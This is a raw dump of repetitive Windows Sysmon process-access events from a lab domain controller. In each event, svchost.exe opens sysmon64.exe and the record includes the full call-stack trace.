09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053258Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053257Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053256Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053255Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053254Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.410{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053239Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.394{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053238Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 